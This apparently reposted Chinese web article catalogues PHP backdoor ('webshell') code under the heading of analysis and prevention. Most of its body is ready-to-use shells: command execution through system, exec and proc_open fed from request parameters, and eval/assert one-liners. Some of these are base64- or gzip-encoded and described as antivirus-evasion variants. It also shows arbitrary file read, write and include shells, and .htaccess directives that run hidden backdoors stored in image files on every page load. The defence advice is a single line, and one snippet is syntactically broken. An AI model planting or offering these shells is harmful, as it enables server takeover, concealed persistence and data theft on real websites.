请选择 进入手机版 | 继续访问电脑版
  • 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

php后门木马常用命令分析与防范

原作者: [db:作者] 来自: [db:来源] 收藏 邀请
php后门木马常用的函数大致上可分为四种类型:
  1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
  2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
  3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
  4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

  1. 执行系统命令:
  system 函数
  //test.php?cmd=ls
  system($_GET[cmd]);
  passthru 函数
  //test.php?cmd=ls
  passthru($_GET[cmd]);
  shell_exec 函数
  //test.php?cmd=ls
  echo shell_exec($_GET[cmd]);
  exec 函数
  //test.php?cmd=ls
  $arr = array();
  exec($_GET[cmd],$arr);
  print_r($arr);
  popen 函数
  //test.php?cmd=ls
  $handle = popen('$_GET[cmd], 'r');
  $read = fread($handle, 2096);
  echo $read;
  pclose($handle);
  proc_open 函数
  //test.php?cmd=ls
  $descriptorspec = array(
  0 => array('pipe', 'r'),
  1 => array('pipe', 'w'),
  2 => array('pipe', 'w'),
  );
  $proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
  fclose($pipes[0]);
  $output = array();
  while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
  print_r($output);
  2. 代码执行与加密:
  eval 函数
  //最常见的一句话木马
  eval($_POST[cmd]);
  base64_decode 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
  gzinflate 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
  gzuncompress 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
  gzdecode 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST['cmd']);
  eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
  str_rot13 函数
  //为了免杀及隐藏而加密代码
  //密文: eval($_POST[cmd]);
  eval(str_rot13('riny($_CBFG[pzq]);'));
  assert 函数
  //类似eval函数
  assert($_POST[cmd]);
  call_user_func 函数
  //使用call_user_func调用assert
  call_user_func('assert',$_POST[cmd]);
  call_user_func 函数
  //使用call_user_func调用任意函数
  //test.php?a=assert&cmd=phpinfo()
  call_user_func($_GET[a],$_REQUEST[cmd]);
  组合代码
  //组合方式调用任意函数
  //test.php?a=assert&cmd=phpinfo()
  $_GET[a]($_REQUEST[cmd]);
  3. 文件包含与生成:
  require 函数
  //包含任意文件
  //test.php?file=123.jpg
  require($_GET[file]);
  require_once 函数
  //包含任意文件
  //test.php?file=123.jpg
  require_once($_GET[file]);
  include 函数
  //包含任意文件 www.chnhack.com
  //test.php?file=123.jpg
  include($_GET[file]);
  include_once 函数
  //包含任意文件
  //test.php?file=123.jpg
  include_once($_GET[file]);
  file_get_contents 函数
  //读取任意文件
  //test.php?f=config.inc.php
  echo file_get_contents($_GET['f']);
  file_put_contents 函数
  //生成任意内容文件
  //a=test.php&b=
  file_put_contents($_GET[a],$_GET[b]);
  fputs 函数
  //生成任意内容文件
  //a=test.php&b=
  fputs(fopen($_GET[a],"w"),$_GET[b]);
  4. .htaccess:
  SetHandler
  //可将php代码存于非php后缀文件,例: x.jpg
  //将以下代码写入.htaccess中
  //连接x.jpg即可启动后门木马出处www.admin8.us
  
  SetHandler application/x-httpd-php
  
  auto_prepend_file
  //可将php代码存于非php后缀文件,例: 123.gif
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径
  //访问网站上任何php文件都会启动该php后门木马
  //可在不更改站点源代码的情况下记录所有$_REQUEST的值,也可批量挂马
  php_value auto_prepend_file c:/apache2/htdocs/123.gif
  auto_append_file
  //类似auto_prepend_file
  //可将php代码存于非php后缀文件,例: 123.gif
  //将以下代码写入.htaccess中, 文件路径必须是绝对路径
  //访问网站上任何php文件都会启动该php后门木马
  php_value auto_append_file c:/apache2/htdocs/123.gif
本文由A8站长网首发

防范:这里就简单的介绍下防范,通过php.ini屏蔽一些命令,服务器做好安全配置,定期查找网站后门。 具体的软件可以到s.ogeek.net下载使用

鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
ThinkPHP framework 任意代码执行漏洞预警发布时间:2022-02-06
下一篇:
利用Request对象的包解析漏洞绕过防注入程序发布时间:2022-02-06
热门推荐
热门话题
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap